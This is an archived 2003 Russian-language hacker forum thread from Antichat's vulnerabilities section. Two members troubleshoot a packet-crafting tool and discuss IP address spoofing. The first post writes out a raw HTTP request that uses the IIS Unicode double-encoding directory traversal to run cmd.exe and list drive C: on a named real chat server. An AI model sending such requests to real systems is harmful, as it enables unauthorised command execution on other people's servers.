ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2003, 03:30
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
Talking

Access violation at address XXXXXXXX in module 'INETCRACK.EXE'. Read address FFFFFFFF при посылке пакета:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">GET http://chat.isurgut.ru/..%255C..%255C..%255C../winnt/system32/cmd.exe?/cmd.exe+dir+c:%255C HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Host: chat.isurgut.ru
Proxy-Connection: Keep-Alive[/QUOTE]<span id='postcolor'>
%255С - это юникод &quot;\&quot; (то же что и %5С но на последнюю разновидность юникод-бага IS лечится, заплатка тобишь есть) Если с другими глюками еще можно было мириться то этот баг поверг меня в уныние...
 
Ответить с цитированием

  #2  
Старый 18.11.2003, 13:38
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Загрузил обновленную версию.
Этот баг исправлен.
 
Ответить с цитированием

  #3  
Старый 22.11.2003, 03:57
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

Я тогда порыскал по инету (ну лень было самому писать) и нашел вот это чудо:
HttpGenerator -- мдааа -- ну удивительно похоже на поделки мелкософтовцев дяди билли: такой же ламерский подход к потенциальным юзверям энтой с позволения сказать проги. Зачем все усложнять , поля какието заполнять, проверки производить, - я офигел просто. В таком вот плохом настроении пришлось всеже поставить себе дельфю аж третьей версии и дорабатывать одну свою прогу (она тогда какраз на третьей версии и писалась - давно дело было). Вот тут можешь посмотреть: portsniffer.zip. Единственное отличие что строку Proxy-Connection: Keep-Alive из запроса настоятельно рекомендуецца убрать, а так работает. Ну и &quot;http://chat.isurgut.ru&quot; указывать нет нужды: полный адрес для прокси нужен а мы можем от корня пути считать. Примочки типа аутокоунт уже обленился к тому времени посему и так сойдет. Ну и счас твою новую версию тоже качнул. Сенкс
 
Ответить с цитированием

  #4  
Старый 23.11.2003, 05:48
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

да и еще один баг репорт но уже по этому форуму Алгол сотри мыло.
 
Ответить с цитированием

  #5  
Старый 24.11.2003, 12:57
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Rabid Rabbit @ ноября 22 2003,02:57)</td></tr><tr><td id="QUOTE">Я тогда порыскал по инету (ну лень было самому писать) и нашел вот это чудо:
HttpGenerator -- мдааа -- ну удивительно похоже на поделки мелкософтовцев дяди билли: такой же ламерский подход к потенциальным юзверям энтой с позволения сказать проги. Зачем все усложнять , поля какието заполнять, проверки производить, - я офигел просто.
Вот тут можешь посмотреть: portsniffer.zip. Единственное отличие что строку Proxy-Connection: Keep-Alive из запроса настоятельно рекомендуецца убрать, а так работает.[/QUOTE]<span id='postcolor'>
portsniffer не работает , грит что
---------------------------

---------------------------
Exception EOleSysError in module portsniffer.exe at 00038801.
Класс не зарегистрирован.
---------------------------
ОК &nbsp;
---------------------------
 
Ответить с цитированием

  #6  
Старый 29.11.2003, 05:50
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

Ну ладно, счет 1:1 :-) Там с активиксами запара. Обновил прогу и включил туда недостающие лайбреризы.
 
Ответить с цитированием

  #7  
Старый 01.12.2003, 20:00
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Все равно не работает, та же самая ошибка.

А подделывать IP адрес в пакетах не пробовал ?
 
Ответить с цитированием

  #8  
Старый 02.12.2003, 06:30
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

Да я пробовал на 95, 98, МЕ - работает. Ты бат файл смотрел? Там фишка в том чтобы лайбреризы в систем папку скопировать а затем регистрировать. Но если винда 2000 или там NT т.п. то regsvr32.exe в папке system32 лежит - соответственно тудаже лайбреризы копировать нуна. Ты наверно под ИксПи пускал (под этой системой я не тестировал).

Носки, пользуемые моей прогой являются активиксами, соответственно локал айпи ридонли (изменить это нельзя так как диспинтерфейс) но даже не в этом фишка. Если посылать синаск или там Port Unreachable, Protocol Unreachable и др. то айпи конечно подделать можно. Вот что тогда получится: до первого шлюза пакет дойдет и если у шлюза настройки на диапазон внутренних айпи стоит то отсечка если нет то пойдет дальше но с айпишником шлюза, дойдет до сервера и ответ (если будет) вернется к шлюзу, от шлюза пойдет на подделаный айпи. По моему так хотя это вопрос достаточно сложный и здесь много нюансов. Ну и посоку большинство коннектов устанавливаются в два этапа то принять или послать данные серверу на конкретный порт не получится - т.е. это работает только в одну сторону и неизвестно как там реагирует сервак. Можно широковещательные слать но это уже датаграмы. Можно пользовать сокс5 проксю - тогда рулез. Если прога сокс5 не держит то юзать сокскап прогу.

А ты пробовал? Подробнее плиз.
 
Ответить с цитированием

  #9  
Старый 02.12.2003, 06:35
Аватар для Rabid Rabbit
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

емае, два раза запостил сори. как удалять посты?
 
Ответить с цитированием

  #10  
Старый 02.12.2003, 18:23
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Пробовать то я пробовал, но только на уровне IP протокола (через RAW, Winsock 2).
Установить TCP соединение конечно таким макаром не удается.
Но вот интересно, что будет если установить соединение со своим IP, а при посылке пакета данных подменить обратный адрес? В таком случае какой адрес будет фиксировать удаленный сервер ?



 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ